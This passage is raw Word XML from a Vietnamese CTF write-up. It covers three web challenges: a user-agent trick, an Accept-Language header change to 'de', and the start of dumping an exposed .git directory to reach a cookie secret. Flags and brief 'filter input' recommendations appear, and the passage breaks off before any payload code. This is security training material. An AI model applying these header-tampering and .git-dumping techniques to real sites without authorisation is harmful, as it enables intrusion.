    <w:p w14:paraId="3376A619"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Tiếp tục thực hiện gửi lệnh vào trang robots.txt thì ta thấy có kết nối và thông tin user-agent là </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>G3t_My_Fl@g_N0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>w(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CEC979"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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6916934D" wp14:editId="221DD322">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D14103B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45BF8924" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFCFE85"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Tiếp tục thực hiện thay đổi user-agent và gửi lại thì ta có được full flag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BD295C"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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6D3970E0" wp14:editId="4FAC440D">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE85741"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0xL4ugh{H3r0_I5_You0_F0r_N0w}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32685898" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Khuyến cáo: thực hiện lọc đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B7BFC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_heading=h.x34c24id8h15" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản Catchtoka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0170584E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Catchtoka - data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF84F13" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện chỉnh sửa gói tin để truy cập vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FE6238"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3F0AED3D"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sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tài nguyên:</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId132">
        <w:r w:rsidRPr="007913DC">
          <w:rPr>
            <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId133">
        <w:r w:rsidRPr="007913DC">
          <w:rPr>
            <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Language</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="213C1068"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b/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vào trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E380E"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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1EBB782C" wp14:editId="18FDF479">
            <wp:extent cx="6114105" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1905000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>
        <w:tblW w:w="9140" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9140"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="41161CC2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="470"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0BC93580"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rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Figure 39: Hình ảnh bắt gói tin trang web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="085A0D3B"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Dưới đây là hình ảnh dùng Burp Suite bắt gói tin trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BA403E"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Ngay câu toka only talks German tức toka chỉ nói được tiếng Đức, chúng em đã suy nghĩ đến việc thử sửa giá trị trường Accept-Language thành mã </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>de</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để xem xét chuyện gì xảy ra tiếp theo, và rất may việc sửa chữa như vậy đã giúp chúng em vượt qua được challenge này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613F39A7"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="61987A2E" wp14:editId="319427B4">
            <wp:extent cx="6114105" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3390900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a8"/>
        <w:tblW w:w="9140" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9140"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="274E5438" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="470"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="51939F2D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="240" w:after="240"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Figure 40: Hình ảnh sửa gói tin GET request và thông tin flag hiển thị ở response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0301BE24"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b/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sửa GET request và nhận </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="74E81DBA" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> FLAG{HE4DERS_M4G1C}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C960B0" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Khuyến cáo: Lọc đầu vào cái gói tin gửi lên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538EEA92" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC9CA71" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54681E00" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3953D4BF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601568B2" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_heading=h.vjkqzvbb9d3g" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kịch bản Sonic go </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>brrr</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="305E4F2E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sonic go brrr - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2D105B5F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện gửi payload bằng python để truy cập lấy thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678E262C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Mô tả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B5DF2" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đầu tiên ta sẽ thực hiện tìm kiếm các domain hiện có của trang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732FDF55"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1BC3FAEF" wp14:editId="487E74CC">
            <wp:extent cx="6114105" cy="2882900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="2882900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E97B897" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo ta thấy được là có </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>trang .git</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nên ta sẽ sử dụng git-dumper để tải về</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D91444E"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36538503" wp14:editId="3D2281D5">
            <wp:extent cx="6114105" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F6612A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp theo ta sẽ tìm kiếm flag thì thấy được flag giả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFA79C7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1E81F7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6FDB95A1" wp14:editId="560825BE">
            <wp:extent cx="6114105" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1104900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6C9CD3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ta tiếp tục tìm kiếm thì thấy được thông tin trên đó là cookie trường secret và mã base64 để gửi </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>đi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="14C9180E"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119CC55D" wp14:editId="464C445F">
            <wp:extent cx="5400675" cy="1885950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400675" cy="1885950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AC9CEB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>vậy ta sẽ code để thực hiện gửi payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560C8FF4" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
